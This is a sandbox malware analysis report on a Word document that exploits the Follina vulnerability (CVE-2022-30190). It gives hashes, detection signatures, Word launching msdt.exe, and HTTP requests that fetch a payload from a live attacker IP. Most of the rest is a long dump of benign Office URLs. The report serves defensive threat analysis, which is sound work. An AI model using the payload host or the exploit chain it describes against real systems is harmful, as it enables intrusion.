Windows Analysis Report
doc1712.docx

Overview

General Information

Sample Name: doc1712.docx
Analysis ID: 640804
MD5: 7a91b01a037ccbfe6589161643d0a65a
SHA1: 53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256: f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
Infos:

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: doc1712.docx Virustotal: Detection: 23% Perma Link

Exploits

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic TCP traffic: 192.168.2.5:49754 -> 45.32.185.177:80
Source: global traffic TCP traffic: 192.168.2.5:49765 -> 45.32.185.177:80

Networking

barindex
Source: Traffic Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 45.32.185.177:80 -> 192.168.2.22:49176
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: unknown TCP traffic detected without corresponding DNS query: 45.32.185.177
Source: ~WRS{99114F2D-2DF9-4F1D-B87F-44944CA06DB2}.tmp.0.dr String found in binary or memory: http://45.32.185.177:80/123.RES
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000009.00000002.730185896.00000000028C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.aadrm.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.office.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.onedrive.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://augloop.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cdn.entity.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cortana.ai/api
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://cr.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://directory.services.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://graph.windows.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://graph.windows.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://invites.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://login.windows.local
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://management.azure.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://management.azure.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://messaging.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://officeapps.live.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://onedrive.live.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://osi.office.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office365.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://roaming.edog.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr String found in binary or memory: https://settings.outlook.com
